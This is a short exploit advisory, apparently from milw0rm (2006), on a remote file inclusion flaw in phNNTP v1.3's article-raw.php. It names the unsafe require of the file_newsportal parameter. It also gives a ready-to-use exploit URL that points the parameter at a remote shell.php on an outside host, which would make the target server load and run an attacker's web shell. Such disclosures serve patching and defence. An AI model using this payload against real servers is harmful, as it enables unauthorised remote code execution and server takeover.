24 lines
No EOL
417 B
Text
24 lines
No EOL
417 B
Text
phNNTP v1.3 Remote File Inclusion
|
|
|
|
CreW: ToxiC
|
|
|
|
Bug Found By Drago84
|
|
|
|
Source Code:
|
|
http://freshmeat.net/redir/phnntp/16290/url_tgz/phNNTP-v1.3.tar.gz
|
|
|
|
Problem Is:
|
|
require("$file_newsportal");
|
|
|
|
Page Affect:
|
|
article-raw.php
|
|
|
|
Path:
|
|
Declare file_newsportal
|
|
|
|
ExP:
|
|
http://server/Dir_phNNTP/article-raw.php?file_newsportal=http://www.evalsite.com/shell.php?
|
|
|
|
Greatz: Str0ke
|
|
|
|
# milw0rm.com [2006-08-08] |